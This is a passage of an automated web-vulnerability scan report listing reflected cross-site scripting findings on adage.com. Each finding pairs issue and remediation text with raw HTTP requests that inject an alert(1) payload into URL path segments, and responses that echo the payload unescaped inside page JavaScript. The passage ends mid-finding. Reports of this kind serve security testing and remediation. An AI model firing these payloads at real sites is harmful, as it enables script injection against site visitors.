Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8db"-alert(1)-"34400a44cf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images5e8db"-alert(1)-"34400a44cf3/covers/current_thumb.jpg?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7C01F0407CDBFDB536C693C47FAAA8E3EA06366C; path=/
Set-Cookie: HMAC=3FCE26F7975EF64C3485BC6ADD209E4F49E670A8; path=/
Set-Cookie: HMAC=1EE136AE4BC7CB2223E8568CBF075D130AF22CE9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images5e8db"-alert(1)-"34400a44cf3/covers/current_thumb.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.123. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"9daea6c72f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/covers1f41c"-alert(1)-"9daea6c72f4/current_thumb.jpg?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A994E73B4EC4AFA4C1A68D85C122B15170E31B66; path=/
Set-Cookie: HMAC=6B691B48DA074BDB41DBB9951400754E5957482A; path=/
Set-Cookie: HMAC=6137FBA31A70AC161B60B1E0A29C2D89624C4007; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/covers1f41c"-alert(1)-"9daea6c72f4/current_thumb.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.124. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56835"-alert(1)-"35529e80084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/covers/current_thumb.jpg56835"-alert(1)-"35529e80084?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7F8F2EB234FAA0DDEA15FF9E48B4DBBFA7E5AA87; path=/
Set-Cookie: HMAC=57791D9528900513A9562BDF1792BF764C08250C; path=/
Set-Cookie: HMAC=20FE58E3A742FFC83E26B77B48D6F96C77F94271; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/covers/current_thumb.jpg56835"-alert(1)-"35529e80084"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.125. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a70a2"-alert(1)-"4d9258f54d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa70a2"-alert(1)-"4d9258f54d5/menus/menu_image_9.png?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=91BA507C15B51F53AFF9E3148C3CDF415DD5BE68; path=/
Set-Cookie: HMAC=61874494678E35F276BE5581B4E2B1BB2B6C9C7B; path=/
Set-Cookie: HMAC=71CD6E8494BA0733D7E04A6A0266035429B97F96; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49465
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesa70a2"-alert(1)-"4d9258f54d5/menus/menu_image_9.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.126. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8cf4"-alert(1)-"728edc0a87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/menusc8cf4"-alert(1)-"728edc0a87/menu_image_9.png?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=0F093E4AFE5318C1A46F495C34BD890B8E72BB69; path=/
Set-Cookie: HMAC=58E5D0362EB12EBDED2EA0D7F0B09A4435BE2772; path=/
Set-Cookie: HMAC=2F5A66A976B4089083BBA889AFAA9132EE45C797; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
X0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/menusc8cf4"-alert(1)-"728edc0a87/menu_image_9.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.127. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bf2a"-alert(1)-"9bdd8378318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/menus/menu_image_9.png6bf2a"-alert(1)-"9bdd8378318?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8610679F5B7DE9959FBF876E60CB066A017FE3E7; path=/
Set-Cookie: HMAC=A355FF8C0FCEC0715951C749BD1D721D365C3CD2; path=/
Set-Cookie: HMAC=FDF5B0E1D4D3A12884F8F03CB3D0053AEFCCB3D8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49465
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/menus/menu_image_9.png6bf2a"-alert(1)-"9bdd8378318"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.128. http://adage.com/images/rss.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/rss.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6306a"-alert(1)-"90f8bc51e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6306a"-alert(1)-"90f8bc51e4/rss.gif?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EF2918B128E72C1B4136C6136EB648F7FC851B20; path=/
Set-Cookie: HMAC=2131AD37D643825F5E70D7815C3B398E66105948; path=/
Set-Cookie: HMAC=74AEC57CF10D88DCD7ADF9EFE2CAE5D33521F9F6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49449
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images6306a"-alert(1)-"90f8bc51e4/rss.gif"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y
...[SNIP]...

1.129. http://adage.com/images/rss.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/rss.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18951"-alert(1)-"18895c5edbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/rss.gif18951"-alert(1)-"18895c5edbc?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F83F81A9FE4B8D1E34783B06D038F96703E8DCAE; path=/
Set-Cookie: HMAC=499E2B9B025F826E0FB6D69CF596B1711B436F6B; path=/
Set-Cookie: HMAC=301D7CF40E3CB4D8FE2E7B4A7FBAE82E9EDBD944; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/rss.gif18951"-alert(1)-"18895c5edbc"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.130. http://adage.com/scripts/aa-jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/aa-jquery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5c1"-alert(1)-"efd1d275b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts6b5c1"-alert(1)-"efd1d275b29/aa-jquery.js?1306163348 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=491FC80627954408486863FA6BD1D82C4211B01B; path=/
Set-Cookie: HMAC=6928066DAD3F8CE2BBD6039141CE9D8C1492B9DD; path=/
Set-Cookie: HMAC=AC4FE141C8834964525E237A2D398A6885C33EB8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49456
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1306163348";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts6b5c1"-alert(1)-"efd1d275b29/aa-jquery.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.d
...[SNIP]...

1.131. http://adage.com/scripts/aa-jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/aa-jquery.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2e6"-alert(1)-"a88223141ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/aa-jquery.jscc2e6"-alert(1)-"a88223141ca?1306163348 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DCB69A9480373970B3399FCEF944943FB7052B18; path=/
Set-Cookie: HMAC=71B34320A1D1B58CEA68571D5DB3FC0AA5CFC1E8; path=/
Set-Cookie: HMAC=EB3F5FE75DE03BF93C871E94DA34E7C7E2ECA470; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49456
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1306163348";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/aa-jquery.jscc2e6"-alert(1)-"a88223141ca"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.132. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbaea"-alert(1)-"eeefe3ca7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsbbaea"-alert(1)-"eeefe3ca7cb/fancybox/jquery.fancybox-1.3.4.css?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EB2DD19DA59BDBE9084BFE874E00705245027887; path=/
Set-Cookie: HMAC=C142B740DF1382D46A75D81B151DBF7CDD5AE67C; path=/
Set-Cookie: HMAC=077448339BAA2DBF49713EA3074192BFD86751C9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
